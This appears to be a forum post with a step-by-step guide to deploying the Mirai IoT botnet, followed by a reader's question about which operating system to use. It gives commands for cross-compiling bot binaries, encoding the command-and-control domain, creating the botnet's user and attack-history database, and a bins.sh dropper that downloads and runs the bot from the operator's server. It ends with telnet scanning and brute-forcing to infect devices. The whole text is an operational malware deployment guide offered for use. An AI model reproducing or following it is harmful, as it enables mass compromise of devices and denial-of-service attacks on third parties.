(1) Connect A Domain To Your Server And Install The Following
apt-get update -y
apt-get upgrade -y
apt-get install gcc electric-fence sudo git apache2 screen tftpd tftp xinetd -y
apt-get install mysql-server mysql-client -y

(2) Now We Need To Install Golang From Source (https://pastebin.com/zEj9H9su)
wget https://storage.googleapis.com/golang/go...d64.tar.gz
sudo tar -xvf go1.8.3.linux-amd64.tar.gz
sudo mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
To see if Go installed correctly type in
go version
if you see go version go1.8.3 linux/amd64
then go installed correctly

(3) Time To Cross Compile
mkdir /etc/xcompile
cd /etc/xcompile

wget https://www.uclibc.org/downloads/binarie...4l.tar.bz2
wget https://www.uclibc.org/downloads/binarie...86.tar.bz2
wget https://www.uclibc.org/downloads/binarie...86.tar.bz2
wget https://www.uclibc.org/downloads/binarie...8k.tar.bz2
wget https://www.uclibc.org/downloads/binarie...ps.tar.bz2
wget https://www.uclibc.org/downloads/binarie...el.tar.bz2
wget https://www.uclibc.org/downloads/binarie...pc.tar.bz2
wget https://www.uclibc.org/downloads/binarie...h4.tar.bz2
wget https://www.uclibc.org/downloads/binarie...rc.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources...6l.tar.bz2

tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2

rm *.tar.bz2
mv cross-compiler-armv4l armv4l
mv cross-compiler-i586 i586
mv cross-compiler-i686 i686
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv6l armv6l

(4) Time To Execute The Golang Paths
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/i686/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/usr/local/go/bin
export GOPATH=$HOME/Documents/go

(5) Getting the drivers and stringing domain
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
cd tools
gcc enc.c -o enc -pthread
./enc string domain.com copy and paste the string and xord number into a file so you dont forget it

(6) Linking domain
Go to table.c in /mirai/bot
replace the then get your xords thing then where you see add_entry(TABLE_CNC_DOMAIN you wanna replace the string there
then you wanna take the number 30 and put your xord number there. where you see add_entry(TABLE_SCAN_CB_DOMAIN do the exact same thing for there then exit and save the file
make sure you dont mess up either

(7) Setting Up The Database
In mirai/cnc edit the main.go
const DatabaseAddr string = "127.0.0.1:3306"
const DatabaseAddr string = "root"
const DatabaseAddr string = "mysql pass here"
const DatabaseAddr string = "mirai"

(8) Set up the database in mysql
mysql -u root -p
then enter password
create database mirai;
use mirai
then enter this
CREATE TABLE `history` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL,
`time_sent` int(10) unsigned NOT NULL,
`duration` int(10) unsigned NOT NULL,
`command` text NOT NULL,
`max_bots` int(11) DEFAULT '-1',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
);

CREATE TABLE `users` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`username` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL,
`duration_limit` int(10) unsigned DEFAULT NULL,
`cooldown` int(10) unsigned NOT NULL,
`wrc` int(10) unsigned DEFAULT NULL,
`last_paid` int(10) unsigned NOT NULL,
`max_bots` int(11) DEFAULT '-1',
`admin` int(10) unsigned DEFAULT '0',
`intvl` int(10) unsigned DEFAULT '30',
`api_key` text,
PRIMARY KEY (`id`),
KEY `username` (`username`)
);

CREATE TABLE `whitelist` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`prefix` varchar(16) DEFAULT NULL,
`netmask` tinyint(3) unsigned DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `prefix` (`prefix`)
);

after that you wanna make logins to who ever you want on the net for ex
INSERT INTO users VALUES (NULL, 'root', 'bushdid911', 0, 0, 0, 0, -1, 1, 30, '');

(9) Now go to your mirai folder and run ./build.sh release telnet
then
cd release
mkdir /var/www/html/bins
mv mirai* /var/www/html/bins
screen ./cnc (then press control+a+d)

(10) Setting Mirai bins.sh up
go to /var/www/html/bins
then do
nano bins.sh
then edit this then paste it into the bins.sh nano window
#!/bin/sh

# Edit
WEBSERVER="ServerIP:80"
# Stop editing now

BINARIES="mirai.arm4n mirai.arm5n mirai.arm6n mirai.i586 mirai.i686 mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.spc mirai.x86"

for Binary in $BINARIES; do
wget http://$WEBSERVER/$Binary -O dvrHelper
chmod 777 dvrHelper
./dvrHelper
done

Control+o then press y
then control + x

(11) Setting echoloader bins up
cd /root/dlr/
then do nano main.c
edit the ip 127,0,0,1 to your server ip with commas (ex 1,3,3,7)
then save it
then do
sh build.sh
then do
cp dlr.* /root/loader/bins/
then do cd
then do cd loader
then cd main.c
edit all the ips in there with your servers ip
then go back into your loader directory and run
sh build.sh
congratulations you now setup echoloader
to scan you want to either
zmap -p23 -otelnet.txt then brute it
or if you already have a list do
cat list.txt | ./loader

Thanks bro much appreciated, one question though, what operating system should I use for this does it matter? I would imagine I should use Debian, or CentOS, right?
